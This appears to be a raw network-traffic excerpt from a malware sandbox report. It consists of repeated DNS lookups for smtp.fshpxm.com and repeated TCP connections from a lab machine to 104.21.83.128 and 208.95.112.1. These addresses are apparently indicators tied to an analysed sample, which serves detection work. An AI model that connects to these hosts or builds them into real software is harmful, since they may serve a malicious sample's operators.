                    Source: global trafficDNS query: name: smtp.fshpxm.com
                    Source: global trafficDNS query: name: smtp.fshpxm.com
                    Source: global trafficDNS query: name: smtp.fshpxm.com
                    Source: global trafficDNS query: name: smtp.fshpxm.com
                    Source: global trafficDNS query: name: smtp.fshpxm.com
                    Source: global trafficDNS query: name: smtp.fshpxm.com
                    Source: global trafficDNS query: name: smtp.fshpxm.com
                    Source: global trafficDNS query: name: smtp.fshpxm.com
                    Source: global trafficDNS query: name: smtp.fshpxm.com
                    Source: global trafficDNS query: name: smtp.fshpxm.com
                    Source: global trafficDNS query: name: smtp.fshpxm.com
                    Source: global trafficDNS query: name: smtp.fshpxm.com
                    Source: global trafficDNS query: name: smtp.fshpxm.com
                    Source: global trafficDNS query: name: smtp.fshpxm.com
                    Source: global trafficDNS query: name: smtp.fshpxm.com
                    Source: global trafficDNS query: name: smtp.fshpxm.com
                    Source: global trafficDNS query: name: smtp.fshpxm.com
                    Source: global trafficDNS query: name: smtp.fshpxm.com
                    Source: global trafficDNS query: name: smtp.fshpxm.com
                    Source: global trafficDNS query: name: smtp.fshpxm.com
                    Source: global trafficDNS query: name: smtp.fshpxm.com
                    Source: global trafficDNS query: name: smtp.fshpxm.com
                    Source: global trafficDNS query: name: smtp.fshpxm.com
                    Source: global trafficDNS query: name: smtp.fshpxm.com
                    Source: global trafficDNS query: name: smtp.fshpxm.com
                    Source: global trafficDNS query: name: smtp.fshpxm.com
                    Source: global trafficDNS query: name: smtp.fshpxm.com
                    Source: global trafficDNS query: name: smtp.fshpxm.com
                    Source: global trafficDNS query: name: smtp.fshpxm.com
                    Source: global trafficDNS query: name: smtp.fshpxm.com
                    Source: global trafficDNS query: name: smtp.fshpxm.com
                    Source: global trafficDNS query: name: smtp.fshpxm.com
                    Source: global trafficDNS query: name: smtp.fshpxm.com
                    Source: global trafficDNS query: name: smtp.fshpxm.com
                    Source: global trafficDNS query: name: smtp.fshpxm.com
                    Source: global trafficDNS query: name: smtp.fshpxm.com
                    Source: global trafficDNS query: name: smtp.fshpxm.com
                    Source: global trafficDNS query: name: smtp.fshpxm.com
                    Source: global trafficDNS query: name: smtp.fshpxm.com
                    Source: global trafficDNS query: name: smtp.fshpxm.com
                    Source: global trafficDNS query: name: smtp.fshpxm.com
                    Source: global trafficDNS query: name: smtp.fshpxm.com
                    Source: global trafficDNS query: name: smtp.fshpxm.com
                    Source: global trafficDNS query: name: smtp.fshpxm.com
                    Source: global trafficDNS query: name: smtp.fshpxm.com
                    Source: global trafficDNS query: name: smtp.fshpxm.com
                    Source: global trafficDNS query: name: smtp.fshpxm.com
                    Source: global trafficDNS query: name: smtp.fshpxm.com
                    Source: global trafficDNS query: name: smtp.fshpxm.com
                    Source: global trafficDNS query: name: smtp.fshpxm.com
                    Source: global trafficDNS query: name: smtp.fshpxm.com
                    Source: global trafficDNS query: name: smtp.fshpxm.com
                    Source: global trafficDNS query: name: smtp.fshpxm.com
                    Source: global trafficDNS query: name: smtp.fshpxm.com
                    Source: global trafficDNS query: name: smtp.fshpxm.com
                    Source: global trafficDNS query: name: smtp.fshpxm.com
                    Source: global trafficDNS query: name: smtp.fshpxm.com
                    Source: global trafficDNS query: name: smtp.fshpxm.com
                    Source: global trafficDNS query: name: smtp.fshpxm.com
                    Source: global trafficDNS query: name: smtp.fshpxm.com
                    Source: global trafficDNS query: name: smtp.fshpxm.com
                    Source: global trafficDNS query: name: smtp.fshpxm.com
                    Source: global trafficDNS query: name: smtp.fshpxm.com
                    Source: global trafficDNS query: name: smtp.fshpxm.com
                    Source: global trafficDNS query: name: smtp.fshpxm.com
                    Source: global trafficDNS query: name: smtp.fshpxm.com
                    Source: global trafficDNS query: name: smtp.fshpxm.com
                    Source: global trafficDNS query: name: smtp.fshpxm.com
                    Source: global trafficDNS query: name: smtp.fshpxm.com
                    Source: global trafficDNS query: name: smtp.fshpxm.com
                    Source: global trafficDNS query: name: smtp.fshpxm.com
                    Source: global trafficDNS query: name: smtp.fshpxm.com
                    Source: global trafficDNS query: name: smtp.fshpxm.com
                    Source: global trafficDNS query: name: smtp.fshpxm.com
                    Source: global trafficDNS query: name: smtp.fshpxm.com
                    Source: global trafficDNS query: name: smtp.fshpxm.com
                    Source: global trafficDNS query: name: smtp.fshpxm.com
                    Source: global trafficDNS query: name: smtp.fshpxm.com
                    Source: global trafficDNS query: name: smtp.fshpxm.com
                    Source: global trafficDNS query: name: smtp.fshpxm.com
                    Source: global trafficDNS query: name: smtp.fshpxm.com
                    Source: global trafficDNS query: name: smtp.fshpxm.com
                    Source: global trafficDNS query: name: smtp.fshpxm.com
                    Source: global trafficDNS query: name: smtp.fshpxm.com
                    Source: global trafficDNS query: name: smtp.fshpxm.com
                    Source: global trafficDNS query: name: smtp.fshpxm.com
                    Source: global trafficDNS query: name: smtp.fshpxm.com
                    Source: global trafficDNS query: name: smtp.fshpxm.com
                    Source: global trafficDNS query: name: smtp.fshpxm.com
                    Source: global trafficDNS query: name: smtp.fshpxm.com
                    Source: global trafficDNS query: name: smtp.fshpxm.com
                    Source: global trafficDNS query: name: smtp.fshpxm.com
                    Source: global trafficDNS query: name: smtp.fshpxm.com
                    Source: global trafficDNS query: name: smtp.fshpxm.com
                    Source: global trafficDNS query: name: smtp.fshpxm.com
                    Source: global trafficDNS query: name: smtp.fshpxm.com
                    Source: global trafficDNS query: name: smtp.fshpxm.com
                    Source: global trafficDNS query: name: smtp.fshpxm.com
                    Source: global trafficDNS query: name: smtp.fshpxm.com
                    Source: global trafficDNS query: name: smtp.fshpxm.com
                    Source: global trafficDNS query: name: smtp.fshpxm.com
                    Source: global trafficDNS query: name: smtp.fshpxm.com
                    Source: global trafficDNS query: name: smtp.fshpxm.com
                    Source: global trafficDNS query: name: smtp.fshpxm.com
                    Source: global trafficDNS query: name: smtp.fshpxm.com
                    Source: global trafficDNS query: name: smtp.fshpxm.com
                    Source: global trafficDNS query: name: smtp.fshpxm.com
                    Source: global trafficDNS query: name: smtp.fshpxm.com
                    Source: global trafficDNS query: name: smtp.fshpxm.com
                    Source: global trafficDNS query: name: smtp.fshpxm.com
                    Source: global trafficDNS query: name: smtp.fshpxm.com
                    Source: global trafficDNS query: name: smtp.fshpxm.com
                    Source: global trafficDNS query: name: smtp.fshpxm.com
                    Source: global trafficDNS query: name: smtp.fshpxm.com
                    Source: global trafficDNS query: name: smtp.fshpxm.com
                    Source: global trafficDNS query: name: smtp.fshpxm.com
                    Source: global trafficDNS query: name: smtp.fshpxm.com
                    Source: global trafficDNS query: name: smtp.fshpxm.com
                    Source: global trafficDNS query: name: smtp.fshpxm.com
                    Source: global trafficDNS query: name: smtp.fshpxm.com
                    Source: global trafficDNS query: name: smtp.fshpxm.com
                    Source: global trafficDNS query: name: smtp.fshpxm.com
                    Source: global trafficDNS query: name: smtp.fshpxm.com
                    Source: global trafficDNS query: name: smtp.fshpxm.com
                    Source: global trafficDNS query: name: smtp.fshpxm.com
                    Source: global trafficDNS query: name: smtp.fshpxm.com
                    Source: global trafficDNS query: name: smtp.fshpxm.com
                    Source: global trafficDNS query: name: smtp.fshpxm.com
                    Source: global trafficDNS query: name: smtp.fshpxm.com
                    Source: global trafficDNS query: name: smtp.fshpxm.com
                    Source: global trafficDNS query: name: smtp.fshpxm.com
                    Source: global trafficDNS query: name: smtp.fshpxm.com
                    Source: global trafficDNS query: name: smtp.fshpxm.com
                    Source: global trafficDNS query: name: smtp.fshpxm.com
                    Source: global trafficDNS query: name: smtp.fshpxm.com
                    Source: global trafficDNS query: name: smtp.fshpxm.com
                    Source: global trafficDNS query: name: smtp.fshpxm.com
                    Source: global trafficDNS query: name: smtp.fshpxm.com
                    Source: global trafficDNS query: name: smtp.fshpxm.com
                    Source: global trafficDNS query: name: smtp.fshpxm.com
                    Source: global trafficDNS query: name: smtp.fshpxm.com
                    Source: global trafficDNS query: name: smtp.fshpxm.com
                    Source: global trafficDNS query: name: smtp.fshpxm.com
                    Source: global trafficDNS query: name: smtp.fshpxm.com
                    Source: global trafficDNS query: name: smtp.fshpxm.com
                    Source: global trafficDNS query: name: smtp.fshpxm.com
                    Source: global trafficDNS query: name: smtp.fshpxm.com
                    Source: global trafficDNS query: name: smtp.fshpxm.com
                    Source: global trafficDNS query: name: smtp.fshpxm.com
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 208.95.112.1:80
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 208.95.112.1:80
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
                    Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
